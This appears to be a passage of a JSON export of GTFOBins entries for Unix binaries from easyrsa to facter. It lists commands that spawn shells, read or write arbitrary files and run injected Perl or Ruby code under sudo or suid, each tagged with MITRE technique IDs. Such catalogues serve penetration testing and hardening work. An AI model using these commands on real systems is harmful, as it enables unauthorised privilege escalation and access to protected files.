1>&0)\"' >/path/to/temp-file\neasyrsa --vars=/path/to/temp-file","description":"This command might not be in the `PATH`, it could be found in, `/usr/share/easy-rsa/easyrsa`. The shell is spawn twice.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/easyrsa/"]},{"id":"gtfo:easyrsa:shell:0:suid","toolId":"gtfo:easyrsa","toolName":"easyrsa","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'set_var X \"$(/bin/sh 1>&0)\"' >/path/to/temp-file\neasyrsa --vars=/path/to/temp-file","description":"This command might not be in the `PATH`, it could be found in, `/usr/share/easy-rsa/easyrsa`. The shell is spawn twice.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/easyrsa/"]},{"id":"gtfo:easyrsa:shell:0:unprivileged","toolId":"gtfo:easyrsa","toolName":"easyrsa","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'set_var X \"$(/bin/sh 1>&0)\"' >/path/to/temp-file\neasyrsa --vars=/path/to/temp-file","description":"This command might not be in the `PATH`, it could be found in, `/usr/share/easy-rsa/easyrsa`. The shell is spawn twice.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/easyrsa/"]},{"id":"gtfo:eb:inherit:0:sudo","toolId":"gtfo:eb","toolName":"eb","name":"inherit ← journalctl","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["inherit"],"command":"eb logs","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/eb/"]},{"id":"gtfo:eb:inherit:0:unprivileged","toolId":"gtfo:eb","toolName":"eb","name":"inherit ← journalctl","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["inherit"],"command":"eb logs","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/eb/"]},{"id":"gtfo:ed:file-read:0:sudo","toolId":"gtfo:ed","toolName":"ed","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ed /path/to/input-file\n,p\nq","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:ed:file-read:0:suid","toolId":"gtfo:ed","toolName":"ed","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ed /path/to/input-file\n,p\nq","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:ed:file-read:0:unprivileged","toolId":"gtfo:ed","toolName":"ed","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ed /path/to/input-file\n,p\nq","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:ed:file-write:0:sudo","toolId":"gtfo:ed","toolName":"ed","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ed /path/to/output-file\na\nDATA\n.\nw\nq","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:ed:file-write:0:suid","toolId":"gtfo:ed","toolName":"ed","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ed /path/to/output-file\na\nDATA\n.\nw\nq","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:ed:file-write:0:unprivileged","toolId":"gtfo:ed","toolName":"ed","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"ed /path/to/output-file\na\nDATA\n.\nw\nq","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:ed:shell:0:sudo","toolId":"gtfo:ed","toolName":"ed","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ed\n!/bin/sh\nq","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:ed:shell:0:suid","toolId":"gtfo:ed","toolName":"ed","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ed\n!/bin/sh\nq","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:ed:shell:0:unprivileged","toolId":"gtfo:ed","toolName":"ed","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ed\n!/bin/sh\nq","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:efax:file-read:0:sudo","toolId":"gtfo:efax","toolName":"efax","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"efax -d /path/to/input-file","description":"The content is actually parsed by the command.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/efax/"]},{"id":"gtfo:efax:file-read:0:suid","toolId":"gtfo:efax","toolName":"efax","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"efax -d /path/to/input-file","description":"The content is actually parsed by the command.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/efax/"]},{"id":"gtfo:egrep:file-read:0:sudo","toolId":"gtfo:egrep","toolName":"egrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/egrep/"]},{"id":"gtfo:egrep:file-read:0:suid","toolId":"gtfo:egrep","toolName":"egrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/egrep/"]},{"id":"gtfo:egrep:file-read:0:unprivileged","toolId":"gtfo:egrep","toolName":"egrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/egrep/"]},{"id":"gtfo:elvish:file-read:0:sudo","toolId":"gtfo:elvish","toolName":"elvish","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"elvish -c 'print (slurp </path/to/input-file)'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:elvish:file-read:0:suid","toolId":"gtfo:elvish","toolName":"elvish","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"elvish -c 'print (slurp </path/to/input-file)'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:elvish:file-read:0:unprivileged","toolId":"gtfo:elvish","toolName":"elvish","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"elvish -c 'print (slurp </path/to/input-file)'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:elvish:file-write:0:sudo","toolId":"gtfo:elvish","toolName":"elvish","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"elvish -c 'print DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:elvish:file-write:0:suid","toolId":"gtfo:elvish","toolName":"elvish","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"elvish -c 'print DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:elvish:file-write:0:unprivileged","toolId":"gtfo:elvish","toolName":"elvish","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"elvish -c 'print DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:elvish:shell:0:sudo","toolId":"gtfo:elvish","toolName":"elvish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"elvish","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:elvish:shell:0:suid","toolId":"gtfo:elvish","toolName":"elvish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"elvish","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:elvish:shell:0:unprivileged","toolId":"gtfo:elvish","toolName":"elvish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"elvish","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:emacs:file-read:0:sudo","toolId":"gtfo:emacs","toolName":"emacs","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"emacs /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/emacs/"]},{"id":"gtfo:emacs:file-read:0:unprivileged","toolId":"gtfo:emacs","toolName":"emacs","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"emacs /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/emacs/"]},{"id":"gtfo:emacs:file-write:0:sudo","toolId":"gtfo:emacs","toolName":"emacs","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"emacs /path/to/output-file\nDATA\nC-x C-s","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/emacs/"]},{"id":"gtfo:emacs:file-write:0:unprivileged","toolId":"gtfo:emacs","toolName":"emacs","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"emacs /path/to/output-file\nDATA\nC-x C-s","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/emacs/"]},{"id":"gtfo:emacs:shell:0:sudo","toolId":"gtfo:emacs","toolName":"emacs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"emacs -Q -nw --eval '(term \"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/emacs/"]},{"id":"gtfo:emacs:shell:0:unprivileged","toolId":"gtfo:emacs","toolName":"emacs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"emacs -Q -nw --eval '(term \"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/emacs/"]},{"id":"gtfo:enscript:shell:0:sudo","toolId":"gtfo:enscript","toolName":"enscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"enscript /dev/null -qo /dev/null -I '/bin/sh >&2'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/enscript/"]},{"id":"gtfo:enscript:shell:0:suid","toolId":"gtfo:enscript","toolName":"enscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"enscript /dev/null -qo /dev/null -I '/bin/sh >&2'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/enscript/"]},{"id":"gtfo:enscript:shell:0:unprivileged","toolId":"gtfo:enscript","toolName":"enscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"enscript /dev/null -qo /dev/null -I '/bin/sh >&2'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/enscript/"]},{"id":"gtfo:env:shell:0:sudo","toolId":"gtfo:env","toolName":"env","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"env /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/env/"]},{"id":"gtfo:env:shell:0:suid","toolId":"gtfo:env","toolName":"env","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"env /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/env/"]},{"id":"gtfo:env:shell:0:unprivileged","toolId":"gtfo:env","toolName":"env","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"env /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/env/"]},{"id":"gtfo:eqn:file-read:0:sudo","toolId":"gtfo:eqn","toolName":"eqn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"eqn /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/eqn/"]},{"id":"gtfo:eqn:file-read:0:suid","toolId":"gtfo:eqn","toolName":"eqn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"eqn /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/eqn/"]},{"id":"gtfo:eqn:file-read:0:unprivileged","toolId":"gtfo:eqn","toolName":"eqn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"eqn /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/eqn/"]},{"id":"gtfo:espeak:file-read:0:sudo","toolId":"gtfo:espeak","toolName":"espeak","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"espeak -qXf /path/to/input-file","description":"The file content appears in the middle of other textual information as phonemes.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/espeak/"]},{"id":"gtfo:espeak:file-read:0:suid","toolId":"gtfo:espeak","toolName":"espeak","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"espeak -qXf /path/to/input-file","description":"The file content appears in the middle of other textual information as phonemes.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/espeak/"]},{"id":"gtfo:espeak:file-read:0:unprivileged","toolId":"gtfo:espeak","toolName":"espeak","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"espeak -qXf /path/to/input-file","description":"The file content appears in the middle of other textual information as phonemes.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/espeak/"]},{"id":"gtfo:ex:inherit:0:sudo","toolId":"gtfo:ex","toolName":"ex","name":"inherit ← ed","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:ed"],"command":"ex","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ex/"]},{"id":"gtfo:ex:inherit:0:suid","toolId":"gtfo:ex","toolName":"ex","name":"inherit ← ed","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:ed"],"command":"ex","mitre":["T1005","T1565","T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ex/"]},{"id":"gtfo:ex:inherit:0:unprivileged","toolId":"gtfo:ex","toolName":"ex","name":"inherit ← ed","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:ed"],"command":"ex","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ex/"]},{"id":"gtfo:ex:shell:0:sudo","toolId":"gtfo:ex","toolName":"ex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ex -c ':!/bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ex/"]},{"id":"gtfo:ex:shell:0:suid","toolId":"gtfo:ex","toolName":"ex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ex -c ':!/bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ex/"]},{"id":"gtfo:ex:shell:0:unprivileged","toolId":"gtfo:ex","toolName":"ex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ex -c ':!/bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ex/"]},{"id":"gtfo:exiftool:file-read:0:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"exiftool -filename=/path/to/output-file /path/to/input-file\ncat /path/to/output-file","description":"If the permissions allow it, files are moved (instead of copied) to the destination.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-read:0:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"exiftool -filename=/path/to/output-file /path/to/input-file\ncat /path/to/output-file","description":"If the permissions allow it, files are moved (instead of copied) to the destination.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-write:0:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"exiftool -filename=/path/to/output-file /path/to/input-file","description":"If the permissions allow it, files are moved (instead of copied) to the destination.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-write:0:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"exiftool -filename=/path/to/output-file /path/to/input-file","description":"If the permissions allow it, files are moved (instead of copied) to the destination.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-write:1:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"exiftool \"-description<=/path/to/input-file --filename /path/to/output-file","description":"The output file must exists, either empty or be a supported image file. The content is written amidst other content.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-write:1:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"exiftool \"-description<=/path/to/input-file --filename /path/to/output-file","description":"The output file must exists, either empty or be a supported image file. The content is written amidst other content.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-write:2:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"exiftool \"-description=DATA --filename /path/to/output-file","description":"The output file must exists, either empty or be a supported image file. The content is written amidst other content.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-write:2:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"exiftool \"-description=DATA --filename /path/to/output-file","description":"The output file must exists, either empty or be a supported image file. The content is written amidst other content.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-write:3:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"exiftool -description -W /path/to/output-file --filename /path/to/input-file","description":"Writes the metadata tags of the input file in textual format to the output.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-write:3:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"exiftool -description -W /path/to/output-file --filename /path/to/input-file","description":"Writes the metadata tags of the input file in textual format to the output.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:inherit:0:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"exiftool -if '...' /etc/passwd","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:inherit:0:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"exiftool -if '...' /etc/passwd","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:expand:file-read:0:sudo","toolId":"gtfo:expand","toolName":"expand","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"expand /path/to/input-file","description":"The read file content is corrupted by replacing tabs with spaces.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/expand/"]},{"id":"gtfo:expand:file-read:0:suid","toolId":"gtfo:expand","toolName":"expand","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"expand /path/to/input-file","description":"The read file content is corrupted by replacing tabs with spaces.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/expand/"]},{"id":"gtfo:expand:file-read:0:unprivileged","toolId":"gtfo:expand","toolName":"expand","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"expand /path/to/input-file","description":"The read file content is corrupted by replacing tabs with spaces.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/expand/"]},{"id":"gtfo:expect:file-read:0:sudo","toolId":"gtfo:expect","toolName":"expect","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"expect /path/to/input-file","description":"The file is read and parsed as an `expect` command file, the content of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/expect/"]},{"id":"gtfo:expect:file-read:0:suid","toolId":"gtfo:expect","toolName":"expect","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"expect /path/to/input-file","description":"The file is read and parsed as an `expect` command file, the content of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/expect/"]},{"id":"gtfo:expect:file-read:0:unprivileged","toolId":"gtfo:expect","toolName":"expect","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"expect /path/to/input-file","description":"The file is read and parsed as an `expect` command file, the content of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/expect/"]},{"id":"gtfo:expect:shell:0:sudo","toolId":"gtfo:expect","toolName":"expect","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"expect -c 'spawn /bin/sh;interact'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/expect/"]},{"id":"gtfo:expect:shell:0:suid","toolId":"gtfo:expect","toolName":"expect","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"expect -c 'spawn /bin/sh -p;interact'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/expect/"]},{"id":"gtfo:expect:shell:0:unprivileged","toolId":"gtfo:expect","toolName":"expect","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"expect -c 'spawn /bin/sh;interact'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/expect/"]},{"id":"gtfo:facter:inherit:0:sudo","toolId":"gtfo:facter","toolName":"facter","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"FACTERLIB=/path/to/dir/ facter","description":"The first `.rb` file in the `/path/to/dir/` directory will be executed.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/facter/"]},{"id":"gtfo:facter:inherit:0:unprivileged","toolId":"gtfo:facter","toolName":"facter","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"FACTERLIB=/path/to/dir/ facter","description":"The first `.rb` file in the `/path/to/dir/` directory will be executed.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/facter/"]},{"id":"gtfo:facter:inherit:1:sudo","toolId":"gtfo:facter","toolName":"facter","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"facter --custom-dir=/path/to/dir/ x","description":"The first `.rb` file in the `/path/to/dir/` directory will be 